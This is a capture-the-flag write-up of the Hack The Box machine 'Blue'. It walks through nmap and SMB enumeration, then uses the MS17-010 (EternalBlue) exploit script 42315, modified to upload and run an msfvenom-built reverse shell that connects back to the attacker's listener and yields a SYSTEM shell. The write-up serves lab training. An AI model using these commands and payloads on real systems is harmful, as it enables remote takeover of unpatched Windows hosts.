HTB Blue

10.10.10.40 - Blue

Hack The Box	Created by	Points
Link	ch4p	20

• 10.10.10.40 - Blue
  • Open ports
  • SMB Vulnerability
    • Changing the exploit script
  • TL;DR

Open ports

luc@kali:~/HTB/Forest$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.40

Port	Service
tcp/135	msrpc
tcp/139	netbios-ssn
tcp/445	microsoft-ds
tcp/49152	msrpc
tcp/49153	msrpc
tcp/49154	msrpc
tcp/49155	msrpc
tcp/49156	msrpc
tcp/49157	msrpc

SMB Vulnerability

luc@kali:~/HTB/Blue$ sudo nmap --script=*smb-vuln* -p139,445 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 15:59 CEST
Nmap scan report for 10.10.10.40
Host is up (0.013s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

This machine is vulnerable to MS17-010 (also known as EternalBlue).

Changing the exploit script

Exploit-db 42315 is a Python script that will exploit MS17-010. We do need to make some changes to it.

This script needs an username and password that can connect to SMB.

luc@kali:~/HTB/Blue$ smbmap -u guest -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY

Guest access is allowed so we can use those credentials.

USERNAME = 'guest'
PASSWORD = ''

We’ll need a payload to be executed, for this we’ll use MSFvenom to generate a Windows executable.

luc@kali:~/HTB/Blue$ msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.16 LPORT=443 > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

The default payload that will be executed is defined in the smb_pwn function.

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

We’ll update this payload to make it upload our executable and run it.

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()
        smb_send_file(smbConn, r'/home/luc/HTB/Blue/shell.exe', 'C', '/shell.exe')
        service_exec(conn, r'cmd /c c://shell.exe')

luc@kali:~/HTB/Blue$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80039e4670
SESSION: 0xfffff8a0022246a0
FLINK: 0xfffff8a008379048
InParam: 0xfffff8a0027d315c
MID: 0xd02
unexpected alignment, diff: 0x5ba5048
leak failed... try again
CONNECTION: 0xfffffa80039e4670
SESSION: 0xfffff8a0022246a0
FLINK: 0xfffff8a0027e5088
InParam: 0xfffff8a0027df15c
MID: 0xd07
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service LgbE.....
Starting service LgbE.....
The NETBIOS connection with the remote host timed out.
Removing service LgbE.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

luc@kali:~/HTB/Blue$ sudo nc -lnvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49164.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd ../../Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt
ff548eb7************************
C:\Users\Administrator\Desktop>cd ../../haris/Desktop
C:\Users\haris\Desktop>type user.txt
4c546aea************************

TL;DR

• Machine is vulnerable to MS17-010, using this exploit gives nt authority\system access